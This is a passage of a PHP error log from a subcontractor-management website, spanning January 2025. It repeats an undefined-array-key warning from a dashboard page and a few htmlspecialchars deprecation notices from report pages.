/home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 06:14:23 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 06:32:03 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 06:49:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 11:25:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 20:40:43 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 20:41:41 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 21:33:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 21:34:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 21:47:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 21:50:08 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 22:39:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 23:37:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 00:00:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 00:42:46 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 01:08:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 01:09:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 02:15:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 03:09:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 03:25:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 04:11:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 04:29:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 04:32:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 04:48:15 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 05:23:04 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 05:30:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 05:32:23 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 05:33:53 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 06:01:48 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 06:43:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 06:50:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 07:07:05 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 09:10:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 10:42:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 22:59:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 22:59:08 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [15-Jan-2025 23:39:33 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 00:32:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 01:55:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 02:52:42 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 03:09:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 03:37:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 03:40:05 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 03:54:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 03:54:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 04:04:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 04:18:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 06:42:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 07:22:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 07:22:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 08:58:13 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 09:23:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 09:31:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 09:41:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 22:11:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [16-Jan-2025 23:47:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Jan-2025 01:09:18 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Jan-2025 01:09:32 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Jan-2025 01:50:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Jan-2025 02:12:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Jan-2025 02:53:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Jan-2025 03:10:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Jan-2025 03:44:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Jan-2025 04:31:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Jan-2025 05:21:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Jan-2025 05:31:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Jan-2025 07:12:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Jan-2025 07:31:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Jan-2025 08:36:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Jan-2025 13:39:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [19-Jan-2025 09:43:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [19-Jan-2025 12:05:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [19-Jan-2025 19:53:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [19-Jan-2025 21:39:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [19-Jan-2025 22:09:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [19-Jan-2025 22:47:36 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [19-Jan-2025 23:47:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 00:21:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 02:18:08 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 03:58:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 03:59:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 04:21:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 05:41:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 07:10:36 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 10:30:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 21:32:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 23:00:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 00:29:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 00:50:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 00:51:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 02:23:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 02:53:46 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 03:39:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 04:15:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 04:21:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 05:19:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 05:36:15 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 06:44:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 07:31:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 11:25:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 11:42:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 22:39:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 23:26:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 00:04:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 00:40:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 01:07:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 01:29:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 02:42:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 02:58:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 04:00:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 04:01:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 04:15:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 05:13:32 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 07:16:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 12:30:33 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 16:24:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 16:26:05 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 16:27:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 22:06:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 22:10:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 22:17:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 22:40:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 23:43:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 23:48:48 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 23:49:01 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [22-Jan-2025 23:49:01 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [22-Jan-2025 23:51:03 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 01:34:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 03:01:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 03:09:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 04:34:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 06:25:35 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 07:25:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 09:29:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 12:13:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 12:45:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 23:06:41 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 23:16:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 23:32:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 23:34:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 00:49:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 01:35:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 02:25:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 02:28:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 02:28:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 02:28:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 03:44:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 03:53:33 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 04:16:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 05:00:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 05:22:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 05:35:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 05:35:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 05:35:32 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 05:36:33 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 05:49:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 06:15:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 06:53:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 07:10:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 07:12:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 10:37:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 11:07:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [25-Jan-2025 01:22:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [25-Jan-2025 01:27:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [26-Jan-2025 05:20:15 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Jan-2025 10:31:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Jan-2025 10:58:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Jan-2025 20:22:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Jan-2025 23:46:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Jan-2025 23:54:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 02:03:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 02:09:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 02:59:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 03:09:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 04:21:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 04:52:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 05:27:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 05:31:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 05:46:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 05:53:07 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 05:53:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 05:54:15 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [28-Jan-2025 05:54:15 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [28-Jan-2025 05:54:53 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [28-Jan-2025 05:54:53 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [28-Jan-2025 05:55:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [28-Jan-2025 05:55:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [28-Jan-2025 06:08:46 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 06:26:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 07:24:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 09:28:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 09:33:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 16:27:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 16:32:23 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 16:32:59 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [28-Jan-2025 16:32:59 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [28-Jan-2025 16:33:09 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [28-Jan-2025 16:33:09 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [28-Jan-2025 16:33:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [28-Jan-2025 16:33:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [28-Jan-2025 16:34:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [28-Jan-2025 16:34:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in 